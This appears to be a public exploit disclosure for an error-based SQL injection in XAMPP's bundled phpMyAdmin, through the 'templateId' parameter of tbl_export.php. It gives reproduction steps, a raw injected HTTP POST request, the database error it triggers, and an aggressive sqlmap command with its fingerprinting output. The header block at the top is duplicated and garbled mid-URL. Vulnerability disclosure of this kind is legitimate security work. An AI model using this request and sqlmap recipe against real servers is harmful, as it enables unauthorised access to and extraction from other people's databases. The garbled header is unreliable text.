# Date: 02/2024
# Exploit Author: Andrey Stoykov
# Version: 5.6.40
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogs # Exploit Title: XAMPP - Error Based SQL Injection
# Date: 02/2024
# Exploit Author: Andrey Stoykov
# Version: 5.6.40
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
Steps to Reproduce:
1. Login to phpmyadmin
2. Visit Export > New Template > test > Create
3. Navigate to "Existing Templates"
4. Select template "test" and click "Update"
5. Trap HTTP POST request
6. Place single quote to "templateId" parameter
// HTTP POST request
POST /phpmyadmin/tbl_export.php HTTP/1.1
Host: 192.168.159.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]
ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy
// HTTP response
HTTP/1.1 200 OK
Date: Tue, 27 Feb 2024 16:44:09 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]
{"success":false,"error":"#1064 - You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the
right syntax to use near '\' AND `username` = 'root'' at line 1"}
sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3
--fingerprint
[...]
[16:55:00] [INFO] confirming MySQL
[16:55:01] [INFO] the back-end DBMS is MySQL
[16:55:01] [INFO] actively fingerprinting MySQL
[16:55:02] [INFO] executing MySQL comment injection fingerprint
web application technology: PHP 5.6.40, Apache 2.4.37
back-end DBMS: active fingerprint: MySQL >= 5.5
comment injection fingerprint: MySQL 5.6.52
fork fingerprint: MariaDB
[...]